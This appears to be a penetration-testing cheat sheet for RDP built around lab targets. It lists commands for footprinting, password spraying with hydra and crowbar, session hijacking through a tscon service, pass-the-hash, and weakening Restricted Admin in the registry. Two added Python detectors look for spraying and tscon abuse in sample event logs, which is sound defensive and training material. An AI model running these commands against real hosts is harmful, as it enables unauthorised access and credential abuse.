RDP (3389)

Footprinting using nmap

nmap -sV -sC 10.129.201.248 -p3389 --script rdp*

RDP Security check

git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check
./rdp-sec-check.pl 10.129.201.248

Initiate an RDP session (Remmina or rdesktop can be used instead of xfreerdp)

xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248 /dynamic-resolution
# rdesktop -u admin -p password123 192.168.2.143

Misconfigurations

  • No password (very uncommon)

  • Weak password

Password Spraying

# crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
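On the defensive side, the crowbar/hydra runs above leave a distinctive trace: one source address producing Event ID 4625 (logon failure) records against many different accounts in a short window. The following detector is an added example, not part of the original notes; it works over constructed 4625-style records already parsed into dicts (field names TargetUserName, IpAddress, LogonType, TimeCreated are the real 4625 fields, but the sample values and the hypothetical `detect_spray` function are mine).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Event ID 4625 (logon failure) records, not real logs.
# Six different accounts fail from one source within seconds: the shape of the
# single-password sprays shown above.
SPRAY_SOURCE = "192.168.220.142"
SAMPLE_EVENTS = [
    {"EventID": 4625, "TargetUserName": user, "IpAddress": SPRAY_SOURCE,
     "LogonType": 10, "TimeCreated": datetime(2024, 1, 1, 9, 0, sec)}
    for sec, user in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])
]
# One user mistyping their own password twice must not be flagged.
SAMPLE_EVENTS += [
    {"EventID": 4625, "TargetUserName": "juurena", "IpAddress": "10.0.0.5",
     "LogonType": 10, "TimeCreated": datetime(2024, 1, 1, 9, 1, 0)},
    {"EventID": 4625, "TargetUserName": "juurena", "IpAddress": "10.0.0.5",
     "LogonType": 10, "TimeCreated": datetime(2024, 1, 1, 9, 1, 5)},
]

# Logon type 10 is RemoteInteractive (classic RDP); with NLA enabled the
# CredSSP failure is recorded as a type 3 (Network) logon instead, so both count.
RDP_LOGON_TYPES = {3, 10}


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Return {source_ip: sorted distinct usernames} for every source that failed
    against at least `min_users` different accounts inside some `window`-long
    interval. Counting distinct accounts rather than raw failures is what
    separates a spray from a single user's typos."""
    by_ip = defaultdict(list)
    for e in events:
        if e.get("EventID") == 4625 and e.get("LogonType") in RDP_LOGON_TYPES:
            by_ip[e["IpAddress"]].append((e["TimeCreated"], e["TargetUserName"]))

    hits = {}
    for ip, attempts in by_ip.items():
        attempts.sort()                      # time-ordered for the sliding window
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users_in_window = {u for _, u in attempts[start:end + 1]}
            if len(users_in_window) >= min_users:
                # Report every account this source touched, not just the window.
                hits[ip] = sorted({u for _, u in attempts})
                break
    return hits


if __name__ == "__main__":
    for ip, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible password spray from {ip}: {len(users)} accounts {users}")
```

The thresholds are deliberately parameters: a spray against a lockout-protected domain typically stays at one or two attempts per account and spreads them out, so a low per-account failure count combined with a high distinct-account count is the signal to alert on, not the total volume.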

Protocol Specific Attacks

Session Hijacking

Requires SYSTEM privileges. Does not work on Server 2019.

Note: If we have local admin privileges, we can use mimikatz or psexec to gain SYSTEM privileges.

  1. List the users (we need the session ID)

PS C:\Users\juurena> query user

  2. Use tscon.exe

C:\htb> tscon {TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

Use the commands below to run tscon as Local System (via a service) and open a new terminal attached to the target session

C:\htb> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0"
C:\htb> net start sessionhijack
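From the blue-team side, the service trick above is loud: the service install lands in the System log as Event ID 7045 with the tscon command in its ImagePath, and the tscon.exe launch itself appears as a Security Event ID 4688 when command-line auditing is on. The detector below is an added example, not part of the original notes; the 7045/4688 field names (ServiceName, ImagePath, NewProcessName, CommandLine, SubjectUserName) are the real ones, while the sample records and the hypothetical `find_tscon_activity` function are constructed for illustration.

```python
import re

# Constructed sample events, not real logs. EventID 7045 = "A service was
# installed" (System log); 4688 = process creation (Security log, needs
# command-line auditing enabled to populate CommandLine).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "sessionhijack",
     "ImagePath": "cmd.exe /k tscon 1 /dest:rdp-tcp#0", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Sysmon64",
     "ImagePath": r"C:\Windows\Sysmon64.exe", "AccountName": "LocalSystem"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\tscon.exe",
     "CommandLine": "tscon 1 /dest:rdp-tcp#0", "SubjectUserName": "SYSTEM"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "SubjectUserName": "juurena"},
]

# tscon with /dest: moves another user's session onto a different station;
# legitimate use is rare enough that the call itself is the signal.
TSCON_DEST_RE = re.compile(r"\btscon(?:\.exe)?\b.*?/dest:", re.IGNORECASE)


def find_tscon_activity(events):
    """Return (kind, actor, command) tuples: 'service_install' when a service's
    ImagePath wraps tscon (the sc.exe create trick above, i.e. tscon running as
    SYSTEM) and 'process_create' when tscon.exe itself is launched with /dest:."""
    findings = []
    for e in events:
        eid = e.get("EventID")
        if eid == 7045 and TSCON_DEST_RE.search(e.get("ImagePath", "")):
            findings.append(("service_install", e.get("ServiceName"), e["ImagePath"]))
        elif eid == 4688 and TSCON_DEST_RE.search(e.get("CommandLine", "")):
            findings.append(("process_create", e.get("SubjectUserName"), e["CommandLine"]))
    return findings


if __name__ == "__main__":
    for kind, actor, cmd in find_tscon_activity(SAMPLE_EVENTS):
        print(f"[{kind}] {actor}: {cmd}")
```

A matching 4778 ("A session was reconnected to a Window Station") for a session whose owner is not the account that triggered it corroborates the hit; disconnected sessions that are never left idle (or are logged off by policy) remove the target the technique relies on.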

Pass the Hash

$ xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

Note: if passing the hash fails, Restricted Admin mode is disabled; enable it by editing the registry. Refer to PtH > Using Linux, or use the command below.

C:\htb> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
